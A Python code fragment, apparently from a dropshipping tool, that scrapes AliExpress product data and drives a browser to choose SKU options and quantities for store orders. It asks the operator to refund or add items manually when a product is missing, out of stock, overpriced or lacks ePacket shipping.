# Exec('# Get Self Url\nself_.url = InceptedProduct().RScan(id=order.product_id).ali_url\nself_.order = order\nself_.saved_data_1 = [{"shipping_address":address_string_from_dict(self_.real_order.shipping_address),"idx":idx,"total quantity":i["quantity"],"title":i["title"],"variant_title":i["variant_title"],"fulfilled quantity":i["quantity"] if i["fulfillment_status"] == "fulfilled" else 0, "ali_url":Get(Product,id=Get(Lineitem,id=i["id"]).product_id).ali_url,"sku":i["sku"]} for idx,i in enum(self_.real_order.line_items)]\n# Get DATA\nx = Aliexpress_Products().get_product_data(url=InceptedProduct().RScan(id=self_.order.product_id).ali_url)\nx_saved = x\n# Get Important VARIABLES\n\n\nshipping_cost = ShippingCost().get_shipping_cost(x.shipping,x_shop)\ndata2 = or_list(lambda: AD(json.loads(findall(str(x.data),1,\'data: ({"actionModule.*),\'))).skuModule.skuPriceList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))\nsku_list = or_list(lambda: AD(json.loads(findall(str(x.data),1,\'data: ({"actionModule.*),\'))).skuModule.productSKUPropertyList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))\nvariants = lmap(lambda i: AD(sku = Join("|",Split(", ", i.skuPropIds)), inventory_quantity = i.skuVal.availQuantity, price = or_list(lambda: flt(i.skuVal.actSkuCalPrice) + shipping_cost, lambda: flt(i.skuVal.skuCalPrice) + shipping_cost)), data2)\nproduct = Get(Product,id=self_.order.product_id)',globals(),locals())
# Get Self Url
self_.url = InceptedProduct().RScan(id=order.product_id).ali_url
self_.order = order
self_.saved_data_1 = [{"shipping_address":address_string_from_dict(self_.real_order.shipping_address),"idx":idx,"total quantity":i["quantity"],"title":i["title"],"variant_title":i["variant_title"],"fulfilled quantity":i["quantity"] if i["fulfillment_status"] == "fulfilled" else 0, "ali_url":Get(Product,id=Get(Lineitem,id=i["id"]).product_id).ali_url,"sku":i["sku"]} for idx,i in enum(self_.real_order.line_items)]
# Get DATA
x = Aliexpress_Products().get_product_data(url=InceptedProduct().RScan(id=self_.order.product_id).ali_url)
x_saved = x
# Get Important VARIABLES
to_continue = False
# Not Found
if x.y == "Not Found":
if("Refund"==OSA.log("This product is not found.\n\nRefund or Manually Add Item To Cart?\n[%s %s %s]"%(((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
#here, continue if it's not found because the rest of the details cannot be calculated
print("to continue: %s" % (to_continue))
if to_continue == True: continue
shipping_cost = ShippingCost().get_shipping_cost(x.shipping,x_shop)
data2 = or_list(lambda: AD(json.loads(findall(str(x.data),1,'data: ({"actionModule.*),'))).skuModule.skuPriceList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))
sku_list = or_list(lambda: AD(json.loads(findall(str(x.data),1,'data: ({"actionModule.*),'))).skuModule.productSKUPropertyList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))
variants = lmap(lambda i: AD(sku = Join("|",Split(", ", i.skuPropIds)), inventory_quantity = i.skuVal.availQuantity, price = or_list(lambda: flt(i.skuVal.actSkuCalPrice) + shipping_cost, lambda: flt(i.skuVal.skuCalPrice) + shipping_cost)), data2)
product = Get(Product,id=self_.order.product_id)
# Exec('to_continue = False \n# Not Found\nif x.y == "Not Found":\n if("Refund"==OSA.log("This product is not found.\\n\\nRefund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# A Variant Not Found\nif Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") not in key("sku", variants):\n if("Refund"==OSA.log("This variant with title: %s at the url: %s is not found.\\n\\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# Out Of Stock\nif keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].inventory_quantity == 0:\n if("Refund"==OSA.log("This variant with title: %s at the url: %s is out of stock.\\n\\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# Low Q\nif keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].inventory_quantity < self_.order.quantity:\n if("Refund"==OSA.log("This variant with title: %s at the url: %s does not have the amount of inventory that the order requires.\\n\\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# High Price\nif keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].price > self_.order.price:\n if("Refund"==OSA.log("This variant with title: %s at the url: %s is priced over the price that it sold for of %s.\\n\\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url,self_.order.price),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# Country Not Supported\nif self_.order.shipping_address.get("country_code") not in ["US"]:\n if("Refund"==OSA.log("This order is shipping to a country outside of the United States. Refund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# Shipping Problem\nif x.y == "No ePacket":\n if("Refund"==OSA.log("This product does not have ePacket Shipping.\\n\\nRefund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# Order Note\nif self_.real_order.note:\n if("Refund"==OSA.log("This order has the note:\\n%s\\n\\nRefund or Manually Add Item To Cart?"%(self_.real_order.note),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True',globals(),locals())
#continue and refund/manually order another boxes
# Country Not Supported
# if self_.order.shipping_address.get("country_code") not in ["US"]:
# if("Refund"==OSA.log("This order is shipping to a country outside of the United States. Refund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):
# (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
# to_continue = True
# else:
# OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
# setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
# self_.manually_setted = True
# to_continue = True
# self_.fulfilled_line_items.append(order)
# OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# A Variant Not Found
if Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") not in key("sku", variants):
if("Refund"==OSA.log("This variant with variant title: %s at the url: %s is not found.\n\nRefund or Manually Add Item To Cart?"%(self_.order.variant_title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# Out Of Stock
if keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].inventory_quantity == 0:
if("Refund"==OSA.log("This variant with title: %s at the url: %s is out of stock.\n\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# Low Q
if keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].inventory_quantity < self_.order.quantity:
if("Refund"==OSA.log("This variant with title: %s at the url: %s does not have the amount of inventory that the order requires.\n\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# High Price
if keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].price > self_.order.price:
if("Refund"==OSA.log("This variant with title: %s at the url: %s is priced over the price that it sold for of %s.\n\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url,self_.order.price),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# Shipping Problem
if x.y == "No ePacket":
if("Refund"==OSA.log("This product does not have ePacket Shipping.\n\nRefund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# Order Note
if self_.real_order.note:
if("Refund"==OSA.log("This order has the note:\n%s\n\nRefund or Manually Add Item To Cart?"%(self_.real_order.note),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
print("to continue: %s" % (to_continue))
if to_continue == True: continue
# 'x = AD(data=requests.get("https://www.aliexpress.com/item/32972321655.html?spm=a2g0o.productlist.0.0.502be3db6PIFg5&algo_pvid=6e6ab535-2674-4ada-badb-f307fa42baaf&algo_expid=6e6ab535-2674-4ada-badb-f307fa42baaf-1&btsid=2e90407e-a1e1-4487-a2f2-a56ac864f81f&ws_ab_test=searchweb0_0,searchweb201602_7,searchweb201603_53").text)\nshipping_cost = 1\ndata2 = or_list(lambda: AD(json.loads(findall(str(x.data),1,\'data: ({"actionModule.*),\'))).skuModule.skuPriceList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))\nsku_list = or_list(lambda: AD(json.loads(findall(str(x.data),1,\'data: ({"actionModule.*),\'))).skuModule.productSKUPropertyList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))\nvariants = lmap(lambda i: AD(sku = Join("|",Split(", ", i.skuPropIds)), inventory_quantity = i.skuVal.availQuantity, price = or_list(lambda: flt(i.skuVal.actSkuCalPrice) + 1, lambda: flt(i.skuVal.skuCalPrice) + 1)), data2)\n# SKU = Get(UniqueProductIdentifier,product_id=self_.order.product_id,shop=self_.order.shop,y=self_.order.sku).x\nSKU = "1583|6144"\nif SKU != "":\n SKU_OPTIONS = lmap(int, Split("|", SKU))\n # for idx, i in enum(SKU_OPTIONS):\n # self_.ss.fid("sku-%s-%s"%((idx+1), i)).click().sp(2)\n r = list(enum(SKU_OPTIONS))\n sku_info_list = []\n for idx, a in r:\n options = keyby(lambda i:i.order == idx+1, sku_list)\n option = options[0]\n for idx2, b in enum(option.skuPropertyValues):\n if b.propertyValueId == a:\n data = AD(option_list_data=None,sku=None,title=None,image_url=None)\n data.option_list_data = (idx, idx2)\n sku_info_list.append(data)\n for info in sku_info_list:\n a, b = info.option_list_data\n sku = info.sku\n title = info.title\n image_url = info.image_url\n entries = self_.ss.fcns("sku-property-list")\n entry = entries[a]\n entry_values = entry.find_elements_by_class_name("sku-property-item")\n entry_value = entry_values[b]\n data.sku = sku\n text,image_url = None, None\n if entry_value.find_elements_by_class_name("sku-property-color"):\n text = entry_value.find_elements_by_class_name("sku-property-color")[0].find_elements_by_tag_name("span")[0].get_attribute("title")\n image_url = None\n data.update(title = text, image_url = image_url)\n if entry_value.find_elements_by_class_name("sku-property-image"):\n text = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("title")\n text = entry_value.find_elements_by_tag_name("img")[0].get_attribute("title")\n image_url = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("src")\n image_url = entry_value.find_elements_by_tag_name("img")[0].get_attribute("src")\n data.update(title = text, image_url = image_url)\n if entry_value.find_elements_by_class_name("sku-property-text"):\n text = entry_value.find_elements_by_class_name("sku-property-text")[0].text\n image_url = None\n data.update(title = text, image_url = image_url)\n OSA.log("option list data: %s, %s\\nsku: %s\\ntitle: %s\\nimage_url: %s\\n\\nPlease check that the info is correct."%(a, b, data.sku, data.title, data.image_url))\n if "selected" not in entry_value.get_attribute("class"):\n entry_value.click()\n sp(2)'
# Exec('# Get URL and CLIKC options\nself_.ss.get(self_.url)\nif self_.order.sku == "Auto":\n # Auto\n OSA.log("Sku is auto. Please fill it out.",tp=False)\nelse:\n SKU = Get(UniqueProductIdentifier,product_id=self_.order.product_id,shop=self_.order.shop,y=self_.order.sku).x\n if SKU != "":\n SKU_OPTIONS = lmap(int, Split("|", SKU))\n # for idx, i in enum(SKU_OPTIONS):\n # self_.ss.fid("sku-%s-%s"%((idx+1), i)).click().sp(2)\n r = list(enum(SKU_OPTIONS))\n sku_info_list = []\n for idx, a in r:\n sku_list_ = key("skuPropertyValues",sku_list)[idx]\n options = keyby(lambda i:i.order == idx+1, sku_list)\n option = options[0]\n for idx2, b in enum(sku_list_):\n if b.propertyValueId == a:\n data = AD(option_list_data=None,sku=None,title=None,image_url=None)\n data.option_list_data = (idx, idx2)\n sku_info_list.append(data)\n for info in sku_info_list:\n a, b = info.option_list_data\n sku = info.sku\n title = info.title\n image_url = info.image_url\n entries = self_.ss.fcns("sku-property-list")\n entry = entries[a]\n entry_values = entry.find_elements_by_class_name("sku-property-item")\n entry_value = entry_values[b]\n data.sku = sku\n text,image_url = None, None\n if entry_value.find_elements_by_class_name("sku-property-color"):\n text = entry_value.find_elements_by_class_name("sku-property-color")[0].find_elements_by_tag_name("span")[0].get_attribute("title")\n image_url = None\n data.update(title = text, image_url = image_url)\n if entry_value.find_elements_by_class_name("sku-property-image"):\n text = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("title")\n text = entry_value.find_elements_by_tag_name("img")[0].get_attribute("title")\n image_url = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("src")\n image_url = entry_value.find_elements_by_tag_name("img")[0].get_attribute("src")\n data.update(title = text, image_url = image_url)\n if entry_value.find_elements_by_class_name("sku-property-text"):\n text = entry_value.find_elements_by_class_name("sku-property-text")[0].text\n image_url = None\n data.update(title = text, image_url = image_url)\n OSA.log("option list data: %s, %s\\nsku: %s\\ntitle: %s\\nimage_url: %s\\n\\nPlease check that the info is correct."%(a, b, data.sku, data.title, data.image_url))\n OSA.log("Entry value class: %s" % (entry_value.get_attribute("class")))\n if "selected" not in entry_value.get_attribute("class"):\n entry_value.click()\n sp(2)\n\n OSA.log("Checking all options could be selected")\n entries = self_.ss.fcns("sku-property-list")\n for idx, a in enum(entries):\n selected = a.find_elements_by_class_name("selected")\n if selected == []:\n OSA.log("Unable to select element for option list #%s"%(idx+1))',globals(),locals())
# Get URL and CLIKC options
self_.ss.get(self_.url)
if self_.order.sku == "Auto":
# Auto
OSA.log("Sku is auto. Please fill it out.",tp=False)
else:
SKU = Get(UniqueProductIdentifier,product_id=self_.order.product_id,shop=self_.order.shop,y=self_.order.sku).x
if SKU != "":
SKU_OPTIONS = lmap(int, Split("|", SKU))
# for idx, i in enum(SKU_OPTIONS):
# self_.ss.fid("sku-%s-%s"%((idx+1), i)).click().sp(2)
r = list(enum(SKU_OPTIONS))
sku_info_list = []
for idx, a in r:
sku_list_ = key("skuPropertyValues",sku_list)[idx]
for idx_v, i in enum(sku_list):
i.order_x = idx_v + 1
options = keyby(lambda i:i.order_x == idx+1, sku_list)
option = options[0]
for idx2, b in enum(sku_list_):
if b.propertyValueId == a:
data = AD(option_list_data=None,sku=None,title=None,image_url=None)
print(idx, idx2)
data.option_list_data = (idx, idx2)
sku_info_list.append(data)
for info in sku_info_list:
a, b = info.option_list_data
sku = info.sku
title = info.title
image_url = info.image_url
entries = self_.ss.fcns("sku-property-list")
entry = entries[a]
entry_values = entry.find_elements_by_class_name("sku-property-item")
entry_value = entry_values[b]
data.sku = sku
text,image_url = None, None
if entry_value.find_elements_by_class_name("sku-property-color"):
text = entry_value.find_elements_by_class_name("sku-property-color")[0].find_elements_by_tag_name("span")[0].get_attribute("title")
image_url = None
data.update(title = text, image_url = image_url)
if entry_value.find_elements_by_class_name("sku-property-image"):
text = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("title")
text = entry_value.find_elements_by_tag_name("img")[0].get_attribute("title")
image_url = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("src")
image_url = entry_value.find_elements_by_tag_name("img")[0].get_attribute("src")
data.update(title = text, image_url = image_url)
if entry_value.find_elements_by_class_name("sku-property-text"):
text = entry_value.find_elements_by_class_name("sku-property-text")[0].text
image_url = None
data.update(title = text, image_url = image_url)
OSA.log("option list data: %s, %s\nsku: %s\ntitle: %s\nimage_url: %s\n\nPlease check that the info is correct."%(a, b, data.sku, data.title, data.image_url))
OSA.log("Entry value class: %s" % (entry_value.get_attribute("class")))
if "selected" not in entry_value.get_attribute("class"):
entry_value.click()
sp(2)
OSA.log("Checking all options could be selected")
entries = self_.ss.fcns("sku-property-list")
for idx, a in enum(entries):
selected = a.find_elements_by_class_name("selected")
if selected == []:
OSA.log("Unable to select element for option list #%s"%(idx+1))
# Exec('to_return = False \n# ADDINVENTORY\nif 0 in lmap(lambda i: self_.ss.fcn("p-quantity-increase").click().sp(1), lrange(self_.order.quantity - 1)):\n (OSA.log("Could not add everything to inventory. This is an error that should not happen. Exitting."))\n to_return = True\n\n# CHECKINVENTORYEQUAL\nif or_list(lambda:int(self_.ss.fcn("product-number-picker",4).find_elements_by_tag_name("input")[0].get_attribute("value")),lambda:int(self_.ss.fcn("p-quantity-input",4).get_attribute("value"))) != self_.order.quantity:\n (OSA.log("Current quantity to add to cart is not equal to the order quantity. This is an error that should not happen. Exitting."))\n to_return = True\n\n# SHIPPING BUTTON CHECK\n# self_.ss.fid("j-shipping-company").click().fcn("s-company-title", _time=30).sp(2)\nself_.ss.ffss("span","ae_button_type","detail_change_freight_click",4).click().sp(2)\nif Shop()(x_shop).Allow_Additional_Shipping_Methods == False:\n if "ePacket" not in sud("text",self_.ss.fcns("service-name")):\n # if tryprocess(lambda: self_.ss.ffst("td","ePacket")) == 0:\n (OSA.log("No ePacket button is available. This is an error that should not happen. Exitting."))\n to_return = True',globals(),locals())
#continue and refund/manually order another boxes
to_continue = False
# ADDINVENTORY
if 0 in lmap(lambda i: self_.ss.fcns("next-after").click().sp(1), lrange(self_.order.quantity - 1)):
(OSA.log("Could not add everything to inventory. This is an error that should not happen."))
option = OSA.log("Do you want to manually find another one to add it to the cart or do you want to refund the quantity that could not be fulfilled?",buttons=["Refund","Manually Add Items To Cart"])
if option == "Refund":
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# CHECKINVENTORYEQUAL
if or_list(lambda:int(self_.ss.fcn("product-number-picker",4).find_elements_by_tag_name("input")[0].get_attribute("value")),lambda:int(self_.ss.fcn("p-quantity-input",4).get_attribute("value"))) != self_.order.quantity:
(OSA.log("Current quantity to add to cart is not equal to the order quantity. This is an error that should not happen."))
option = OSA.log("Do you want to manually find another one to add it to the cart or do you want to refund the quantity that could not be added to the cart?",buttons=["Refund","Manually Add Items To Cart"])
if option == "Refund":
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# SHIPPING BUTTON CHECK
# self_.ss.fid("j-shipping-company").click().fcn("s-company-title", _time=30).sp(2)
self_.ss.ffss("span","ae_button_type","detail_change_freight_click",4).click().sp(2)
if Shop()(x_shop).Allow_Additional_Shipping_Methods == False:
if "ePacket" not in sud("text",self_.ss.fcns("service-name")):
# if tryprocess(lambda: self_.ss.ffst("td","ePacket")) == 0:
(OSA.log("No ePacket button is available. This is an error that should not happen."))
option = OSA.log("Do you want to manually find another one with ePacket to add it to the cart or do you want to refund the items without ePacket?",buttons=["Refund","Manually Add Items To Cart"])
if option == "Refund":
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
if to_continue == True: continue
